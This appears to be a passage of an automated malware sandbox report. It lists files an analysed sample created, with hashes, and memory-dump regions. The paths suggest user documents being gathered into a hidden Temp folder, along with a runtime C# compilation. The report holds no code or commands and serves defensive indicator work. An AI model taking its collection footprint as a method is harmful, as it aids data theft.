40d7e3a84ca091266762ecb3e85928e67c34cdbc146d00a56897b31cb49e8b9d61bdbb0ff4cd29e930d67762048840c2222e99e76f4e82f29ba71651190c2aba

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\LimitGrant.txt

Filesize
647KB

MD5
614b0e72b1c866c1ba935e3bf3f2ad5e

SHA1
1eb74a25e115bd3cece99a135bb4ebe642bba923

SHA256
dfbde03dd0b291533c2c814ef5dfe5b4cbde113aa317a75e56e722d13d20c078

SHA512
4edf366af121d90116777155595afc75c98da3649ee504b939e29fccc5928dec5a00973233340038a9f3aa350997f9edc728f6f40e4141e38485a6b31557ee0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\OptimizeReceive.csv

Filesize
300KB

MD5
d2a9a660641e285f092935367dac210e

SHA1
5e6c113d405f582f51ff7ba4c90cd48411eda264

SHA256
c39febcf543168fce4aa71161104df9fd82d988e8a56b0da20954c08a08d8b55

SHA512
210ac109cb2771c973e1d1817a84ac5cf89f923f80a41439b9f445f52a8adeacf2173b2025428574ade17ae709d115b32d16df1286187fb83869fb3597cd2174

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\RequestRestart.mp3

Filesize
439KB

MD5
4b926f72b54a9922d1461b9a6d2a95bf

SHA1
60a5088a45ca87a66567f40f63d3bfb6fc64b7bf

SHA256
862c786d37e1d828883aa240c29febcc927888eb87c5dfd49177d6198194ca00

SHA512
39867179ab00a2ff7c8b4688f5adcaeb195735e698fbe78b15b53ea034c8fc781ee00ac4484aea305d6d726bc55279b285acf5a561e671162b71b5b9eda3f33a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\SendRestore.xlsx

Filesize
12KB

MD5
73a0e486022a318ad2876069a13f869e

SHA1
8fc05668bfc3f9da89557b0d0a5b982a369e5045

SHA256
b6afeab7f7562e38c4098cfc4bed7d5cf03df7632ff4d2e5e2bf61118ab6a3a2

SHA512
1a6ed454636c67c695c418a7fe296aebc28ee8914a455de17afb9d236c5cecf7d8a1f28ef41e99a71f26c92fe0bb70dad8166d2a5f8ed765cf8169ddbcadc884

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\SuspendPop.xlsx

Filesize
15KB

MD5
e7f4bab834e9d3316307ef63dd57447e

SHA1
8ed7026aca08323acdd4aae6c9b86101cf77e393

SHA256
27ba7d3ca7fa43952d46323425571099c8910b742036bc202c6f1a7814619d31

SHA512
64bf9f6faaf57a801a621e4efb6092f94b9c2a21a2576700181f42f469124996dac02b2f964f67247d9c4f0e93af81bb213db65c1114b7d7b201d3ea757d2d03

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\WatchPush.docx

Filesize
12KB

MD5
978585e0604ff7b6752ed2c38f365a95

SHA1
6b215bfcfa8ddce07f054d51da5b184c8928fb44

SHA256
cb5f361ea8538592633e8b701593840039341646664d6c985d4e36b283bc1c60

SHA512
0db92fee223285b03e84d83d47e47c36e4ad0de38babf8768e2a819788cfe8a55d66588a1e3a5c82c4062336a4df7f7c35051aa77bbc864dfe81f68d6ba5db0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Documents\EnableBlock.docx

Filesize
13KB

MD5
8692c2da8ae32bcd26668dacf358fe00

SHA1
4b98611ce3b6a3fb17e5979ab059ca6522d40079

SHA256
d4bfa5a844c38332f0b57ca1738f87b012a9832ca4ce3d2adb0e8941e9d01e52

SHA512
bbed645cee1049a0641adf250622d01b49d920d7d4780d6e354891dd943d73eb9c4dee0ae1331e55a48ba95e3e04bb24e7899920a5b67b1ca5f8ab149270ac8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Documents\NewComplete.docx

Filesize
16KB

MD5
c2e1e37096749b52709158ad0bbd2d8e

SHA1
a12dddde0c5a8a9410638a0fac3379e7935648e1

SHA256
a243065a7aad4882abc96bcd11cdce952d235f3c733b87c212d5671eebc0a6ee

SHA512
a2ab618e148ab0d0c663a119bcb13267e01c5de54e409ce009967b3c3a71ace20191fde7d013ccf8e77891b07e051a33a2104a70a235bee08bce6ee716e2cbdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Documents\SplitSwitch.docx

Filesize
19KB

MD5
a611b85e20201b18694146b28b575f30

SHA1
35f6d4968e475f312d720b147e95d872e60a7077

SHA256
1c351da7d07adb673c6028b7b1e689541d1bc0497a4beba2f376d158cb1de723

SHA512
921d39a1e553387a1b9b40edac3dd3ccc3c8ac6b41aaabae065c3cda0c37b3d327f0d38a441f2477218d0fb5b59683bef6d1ac8af2d9df4de69b5026cfd19ac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Downloads\ReadWait.docx

Filesize
833KB

MD5
be22641a62c412719924b510b2b915f8

SHA1
9948a401dc14e77fd7245bc3d76b6281ccfc5419

SHA256
71b1520421369fb1b2b4b80edab9007474cc84fab80b557fcac3bf89679e2901

SHA512
0b3ebaa5db45972a5b3fcde6c24a56ed77e13065778f0584ad1dbb822da57d5c269fd8d16dbff633440cca6a857549d4d2b728088f7a8e2dc930865f98706b40

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Downloads\SearchClear.txt

Filesize
762KB

MD5
a1e06fcb86da6ad8cea450b3404a6835

SHA1
86946459d9e041974a38cac3aba010bcd167dfee

SHA256
2e98c86cedf59962454198e7c9077e06638bdde66a0cae67c889588100eecaf0

SHA512
d0d5d38908264acf8e9101add9e79fdac2536c0719e9b19dfd147847fcc72eec6d6661dcb60c6186247abd2d7efdaf1789eb8ae58b885a16a08ade91d82dd76b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pkx3y2wy\CSC27728DB1FE8B494DAE42A3B4D543E65.TMP

Filesize
652B

MD5
22ef50d1154895b2bd73726d9032373f

SHA1
0ccb914fa4451bfe4a96fbcc53a240df560ad039

SHA256
c9d88fda6729e5b90bfddf230b5ed2c097c6e43136ae59053d5a4a31890a2d09

SHA512
841bdfa4beced6c0e82fb69273d860f9cc50b0a1d7dd805fa469e37e23a2e881139b6f5ffd06c5202c9afd4e08dc3f5ee4503c974de2923340e1cb4fe80caa98

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pkx3y2wy\pkx3y2wy.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pkx3y2wy\pkx3y2wy.cmdline

Filesize
607B

MD5
890fe8994445bd8fd34e4da9d8542aac

SHA1
0a91cb841b107fd6e3a2ee6474d34052c3a2c04e

SHA256
d2be223340a06d3a8593d2ca8c6b946e8c0170e032142b533739b3a0944bd843

SHA512
0751aefa5a4be0179ae034a84d41e807d2025d97e523dc52a16fa7dcd2dcd87ce5ae9106f970c6b06194b6949108102144da78547a0a6ab2264580751f1e140b

Download Submit
memory/2088-141-0x000002AFF54A0000-0x000002AFF54C2000-memory.dmp

Filesize
136KB

Download
memory/2868-191-0x00000193815C0000-0x00000193815C8000-memory.dmp

Filesize
32KB

Download
memory/3116-62-0x00007FF9A1690000-0x00007FF9A16A9000-memory.dmp

Filesize
100KB

Download
memory/3116-278-0x00007FF999260000-0x00007FF99932D000-memory.dmp

Filesize
820KB

Download
memory/3116-30-0x00007FF99D420000-0x00007FF99D444000-memory.dmp

Filesize
144KB

Download
memory/3116-220-0x00007FF98A440000-0x00007FF98A5B6000-memory.dmp

Filesize
1.5MB

Download
memory/3116-25-0x00007FF98AAB0000-0x00007FF98B09E000-memory.dmp

Filesize
5.9MB

Download
memory/3116-258-0x00007FF9A1690000-0x00007FF9A16A9000-memory.dmp

Filesize
100KB

Download
memory/3116-54-0x00007FF99D3F0000-0x00007FF99D41D000-memory.dmp

Filesize
180KB

Download
memory/3116-57-0x00007FF999760000-0x00007FF999779000-memory.dmp

Filesize
100KB

Download
memory/3116-58-0x00007FF999730000-0x00007FF999753000-memory.dmp

Filesize
140KB

Download
memory/3116-60-0x00007FF98A440000-0x00007FF98A5B6000-memory.dmp

Filesize
1.5MB

Download
memory/3116-68-0x00007FF98AAB0000-0x00007FF98B09E000-memory.dmp

Filesize
5.9MB

Download
memory/3116-170-0x00007FF999730000-0x00007FF999753000-memory.dmp

Filesize
140KB

Download
memory/3116-64-0x00007FF99D3B0000-0x00007FF99D3BD000-memory.dmp

Filesize
52KB

Download
memory/3116-75-0x00007FF9995B0000-0x00007FF9995C4000-memory.dmp

Filesize
80KB

Download
memory/3116-76-0x00007FF99D2C0000-0x00007FF99D2CD000-memory.dmp

Filesize
52KB

Download
memory/3116-80-0x00007FF998D20000-0x00007FF998E3C000-memory.dmp

Filesize
1.1MB

Download
memory/3116-73-0x00007FF99D420000-0x00007FF99D444000-memory.dmp

Filesize
144KB

Download
memory/3116-71-0x00007FF989F10000-0x00007FF98A432000-memory.dmp

Filesize
5.1MB

Download
memory/3116-69-0x00007FF999A20000-0x00007FF999A53000-memory.dmp

Filesize
204KB

Download
memory/3116-70-0x00007FF999260000-0x00007FF99932D000-memory.dmp

Filesize
820KB

Download
memory/3116-277-0x00007FF999A20000-0x00007FF999A53000-memory.dmp

Filesize
204KB

Download
memory/3116-32-0x00007FF9A2690000-0x00007FF9A269F000-memory.dmp

Filesize
60KB

Download
memory/3116-279-0x00007FF989F10000-0x00007FF98A432000-memory.dmp

Filesize
5.1MB

Download
memory/3116-301-0x00007FF98AAB0000-0x00007FF98B09E000-memory.dmp

Filesize
5.9MB

Download
memory/3116-307-0x00007FF98A440000-0x00007FF98A5B6000-memory.dmp

Filesize
1.5MB

Download
memory/3116-302-0x00007FF99D420000-0x00007FF99D444000-memory.dmp

Filesize
144KB

Download
memory/3116-316-0x00007FF98AAB0000-0x00007FF98B09E000-memory.dmp

Filesize
5.9MB

Download
memory/3116-331-0x00007FF999730000-0x00007FF999753000-memory.dmp

Filesize
140KB

Download
memory/3116-344-0x00007FF998D20000-0x00007FF998E3C000-memory.dmp

Filesize
1.1MB

Download
memory/3116-343-0x00007FF989F10000-0x00007FF98A432000-memory.dmp

Filesize
5.1MB

Download
memory/3116-342-0x00007FF9995B0000-0x00007FF9995C4000-memory.dmp

Filesize
80KB

Download
memory/3116-341-0x00007FF999260000-0x00007FF99932D000-memory.dmp

Filesize
820KB

Download
memory/3116-340-0x00007FF999A20000-0x00007FF999A53000-memory.dmp

Filesize
204KB

Download
memory/3116-339-0x00007FF99D3B0000-0x00007FF99D3BD000-memory.dmp

Filesize
52KB

Download
memory/3116-338-0x00007FF9A1690000-0x00007FF9A16A9000-memory.dmp

Filesize
100KB

Download
memory/3116-337-0x00007FF98A440000-0x00007FF98A5B6000-memory.dmp

Filesize
1.5MB

Download
memory/3116-336-0x00007FF99D2C0000-0x00007FF99D2CD000-memory.dmp

Filesize
52KB

Download
memory/3116-335-0x00007FF999760000-0x00007FF999779000-memory.dmp

Filesize
100KB

Download
memory/3116-334-0x00007FF99D3F0000-0x00007FF99D41D000-memory.dmp

Filesize
180KB

Download
memory/3116-333-0x00007FF9A2690000-0x00007FF9A269F000-memory.dmp

Filesize
60KB

Download
memory/3116-332-0x00007FF99D420000-0x00007FF99D444000-memory.dmp

Filesize
144KB

Download